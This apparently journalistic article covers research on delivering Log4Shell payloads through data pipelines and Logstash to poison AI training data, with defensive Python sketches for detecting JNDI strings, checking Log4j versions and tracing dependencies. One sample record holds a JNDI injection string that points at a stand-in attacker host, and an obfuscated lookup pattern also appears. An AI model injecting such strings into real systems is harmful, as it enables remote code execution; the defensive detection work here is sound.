The Apache Log4j Log4Shell bug is one of the most critical vulnerabilities in the history of cybersecurity.
Log4j runs on hundreds of millions of devices that power online services for government organizations, critical infrastructure operators, companies and individuals.
Log4j is a Java library embedded in a vast amount of software, so the risk is extremely widespread. That is also why hackers have been actively exploiting the bug since it became public in December 2021, sometimes using public PoCs (proofs of concept) that are all too easy to find on GitHub, and the exploit itself is notoriously easy to use.
Zectonal researchers have revealed a new and critically important attack vector for the infamous bug: data pipelines and data lakes. The researchers demonstrate how hackers could poison AI and machine learning systems to bypass detection.
The malicious payload could be injected into big data files used to train AI models. According to the researchers, such an attack is very hard to anticipate and catch. To demonstrate the severity of the threat, they used processes and cloud architectures that are as realistic as possible.
The intent of the exploit is to poison the targeted AI models and associated analytics, rendering the whole data infrastructure ineffective. By introducing malicious payloads into the global data supply chain, hackers could inflict crippling damage on their victims.
Understanding the Big Data Attack
No-code data pipelines used in the research are particularly attractive for an attacker, as “the data flow never transits through any type of firewall or scanning device before it is processed and ultimately gains access to a vulnerable system.”
The researchers deliberately used common cloud-based architecture, storage systems (e.g., buckets), and ETL (extract, transform, load) applications. They also applied standard configurations and files, and hid their payload (the crafted string used to exploit the Log4Shell bug) in a single data point among millions.
The ETL process combines data from multiple sources into a single data pool. ETL applications are essential for data analytics and machine learning workstreams, as they clean and organize the data according to specific rules that meet the business intelligence needs.
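The researchers' point is that nothing inspects records on their way through such a pipeline. As a minimal sketch of the ETL stages with an inspection step added, the Python below merges records from several sources, quarantines any record with a field that looks like a JNDI lookup string during the transform stage, and loads the rest. The function names, the record layout and the detection heuristic are all hypothetical: the heuristic catches the plain `${jndi:` form and nested lookups (a common obfuscation), but it is not a complete Log4Shell signature and is no substitute for patching Log4j.

```python
from __future__ import annotations

import re
from typing import Iterable

# Hypothetical heuristic: nested "${...${" lookups are a common obfuscation trick.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def looks_like_jndi_lookup(value: str) -> bool:
    """Flag strings resembling Log4j JNDI lookups (heuristic, not exhaustive)."""
    lowered = value.lower()
    if "${jndi:" in lowered:  # plain form, e.g. "${jndi:ldap://...}"
        return True
    return NESTED_LOOKUP.search(lowered) is not None  # e.g. "${${lower:j}ndi:...}"


def extract(*sources: Iterable[dict]) -> list[dict]:
    """Extract: combine records from several sources into a single pool."""
    pool: list[dict] = []
    for source in sources:
        pool.extend(source)
    return pool


def transform(records: list[dict]) -> tuple[list[dict], list[dict]]:
    """Transform: quarantine suspicious records, apply a simple cleaning rule to the rest."""
    clean: list[dict] = []
    quarantined: list[dict] = []
    for record in records:
        if any(isinstance(v, str) and looks_like_jndi_lookup(v) for v in record.values()):
            quarantined.append(record)
            continue
        # Example cleaning rule (hypothetical): trim whitespace in string fields.
        clean.append({k: v.strip() if isinstance(v, str) else v for k, v in record.items()})
    return clean, quarantined


def load(records: list[dict], sink: list[dict]) -> None:
    """Load: append cleaned records to the destination (a list stands in for a data lake)."""
    sink.extend(records)


crm_export = [{"id": 1, "name": " Alice "}]
web_logs = [{"id": 2, "user_agent": "${jndi:ldap://attacker.example.invalid/a}"}]

warehouse: list[dict] = []
clean, quarantined = transform(extract(crm_export, web_logs))
load(clean, warehouse)
print(warehouse)         # [{'id': 1, 'name': 'Alice'}]
print(len(quarantined))  # 1
```

Filtering at ingestion is only defense in depth: the attack succeeds because a vulnerable Log4j version eventually logs the string, so upgrading remains the real fix.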
The researchers managed to “gain immediate remote code execution from within a private virtual cloud over the public Internet.” More precisely, they gained remote access to a no-code ETL software service with private subnet IP addresses that was part of a VPC (virtual private cloud) hosted by a public cloud provider.
Such an exploit will likely inspire other attacks, as AI powers many advanced services. Critical sectors such as smart vehicles, healthcare, finance and supply chains are already, or could soon be, automated with deep learning.
Enterprises already use AI to spot patterns and trends in customer analytics and uncover business opportunities. Flaws that give such an evasive attack a path into data lakes must be addressed quickly.
To exploit the Log4Shell vulnerability, the researchers attacked the Logstash component of the ELK stack (Elasticsearch, Logstash, and Kibana), a very popular open-source log management system that boasts millions of downloads.
Such platforms are widely used by enterprises to extract and analyze data. While the latest versions have fixed the Log4Shell vulnerability, the researchers were able to exploit versions released just before Log4Shell was disclosed, running on Java 8.
The researchers exploited a combination that is all too common in enterprises: multiple outdated components that, together, lead to disaster.
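Because the attack depended on outdated Log4j releases running on Java 8, a first defensive step is simply knowing which versions are deployed. The sketch below classifies log4j-core version strings under an assumed policy: on Java 8, any 2.x release below 2.17.1 is flagged for upgrade, since 2.15.0 addressed Log4Shell (CVE-2021-44228) and follow-up issues were fixed in 2.16.0, 2.17.0 and 2.17.1. Log4j 1.x is not affected by Log4Shell but is end-of-life. The host names and versions in the inventory are hypothetical, and products that bundle Log4j (Logstash included) should also be checked against their vendors' own advisories.

```python
from __future__ import annotations

import re

# Assumed policy for Java 8 runtimes: 2.x releases below 2.17.1 need an upgrade.
MIN_SAFE_2X = (2, 17, 1)


def parse_version(version: str) -> tuple[int, ...]:
    """Turn "2.14.1" into (2, 14, 1); a piece like "0-beta9" keeps only its leading digits."""
    parts: list[int] = []
    for piece in version.split("."):
        match = re.match(r"\d+", piece)
        if match is None:
            break
        parts.append(int(match.group()))
    if not parts:
        raise ValueError(f"unrecognized version: {version!r}")
    return tuple((parts + [0, 0, 0])[:3])  # pad or truncate to major.minor.patch


def log4j_status(version: str) -> str:
    """Classify a log4j-core version as "ok", "upgrade" or "end-of-life"."""
    major, minor, patch = parse_version(version)
    if major == 1:
        return "end-of-life"  # not hit by Log4Shell, but no longer maintained
    if (major, minor, patch) < MIN_SAFE_2X:
        return "upgrade"
    return "ok"


# Hypothetical inventory of hosts and the log4j-core version each one ships.
inventory = {
    "pipeline-node-a": "2.14.1",
    "etl-worker": "2.17.1",
    "legacy-reporting": "1.2.17",
}
for host, version in inventory.items():
    print(host, log4j_status(version))
```

Tuple comparison does the version ordering here, which is enough for plain numeric releases; a production scanner would rely on a proper version parser and a maintained vulnerability feed.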
Prevent AI and Open Source Exploits
The researchers cited the Snyk JVM Ecosystem Report 2021, which found that “60% of Java developers still use Java 8 in production.” Indeed, many corporate systems still rely on outdated libraries, putting whole organizations at high risk.
While aggressive patch management can add significant costs and operational complexity, users and administrators need to know which of their hardware and software assets are vulnerable or due for retirement. Attackers now have access to an extensive range of advanced hacking tools that can map vulnerabilities and provide preconfigured payloads to exploit them.
The software supply chain is prone to attacks, and the open-source Log4j library is a striking example. In fact, open source is increasingly a part of enterprise applications and development efforts, and securing the various associated ecosystems will not be free or easy. The dependencies are mind-boggling.
It might seem like a costly undertaking to secure all that, but successful cyberattacks cost far more and, in some cases, put organizations out of business.
The Open Source Security Foundation (OpenSSF), a leading open-source organization associated with the Linux Foundation, recently announced “an ambitious, multipronged plan with 10 key goals to better secure the entire open-source software ecosystem.” The price tag for the program is $150 million, more than $30 million of which has already been pledged by tech giants like Amazon, Ericsson, Google, Intel, Microsoft and VMware.
The plan could help developers fix issues, including through security training, provide security audits, and encourage the use of authenticated package signing for the distribution of software components. The initiative will likely benefit many actors in the software supply chain, including the public sector.
While this is not the first time the Linux Foundation has tried to help secure the open-source world, the software supply chain is now broken enough that key leaders are finally willing to act; hopefully it is not broken beyond the point of no return.
Whether it’s developers who sabotage their own components over a lack of financial support, malicious contributors who inject backdoors into popular open-source libraries, or maintainers who accidentally introduce critical bugs, dependency management can be a nightmare.
On top of these threats, many dependencies themselves rely on other existing components to speed up development, adding layers of indirect dependencies that make the whole mess even harder for companies to manage.
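That extra layer of complexity comes from transitive dependencies: an application can end up running a library it never declared. As a small, hypothetical illustration, the Python sketch below walks a made-up dependency graph breadth-first and reports which applications reach log4j-core only indirectly. All component names are invented; for real Java projects, build tools can print the resolved tree (for example, Maven's `mvn dependency:tree`).

```python
from __future__ import annotations

from collections import deque

# Hypothetical graph: each component lists only the components it pulls in directly.
DEPENDENCIES: dict[str, list[str]] = {
    "billing-app": ["web-framework", "pdf-export"],
    "analytics-app": ["etl-toolkit"],
    "status-page": ["http-server"],
    "web-framework": ["http-server"],
    "pdf-export": ["logging-bridge"],
    "etl-toolkit": ["logging-bridge", "csv-parser"],
    "logging-bridge": ["log4j-core"],
    "http-server": [],
    "csv-parser": [],
    "log4j-core": [],
}


def transitive_deps(root: str, graph: dict[str, list[str]]) -> set[str]:
    """Breadth-first walk collecting every direct and indirect dependency of root."""
    seen: set[str] = set()
    queue = deque(graph.get(root, []))
    while queue:
        dep = queue.popleft()
        if dep in seen:
            continue  # already visited (shared or diamond dependency)
        seen.add(dep)
        queue.extend(graph.get(dep, []))
    return seen


def apps_exposed_to(component: str, apps: list[str], graph: dict[str, list[str]]) -> list[str]:
    """Return the apps whose transitive dependency set contains the component."""
    return [app for app in apps if component in transitive_deps(app, graph)]


apps = ["billing-app", "analytics-app", "status-page"]
print(apps_exposed_to("log4j-core", apps, DEPENDENCIES))  # ['billing-app', 'analytics-app']
```

Neither exposed application lists log4j-core directly; both reach it through a shared logging component, which is exactly why a flaw deep in the tree is so hard to track down.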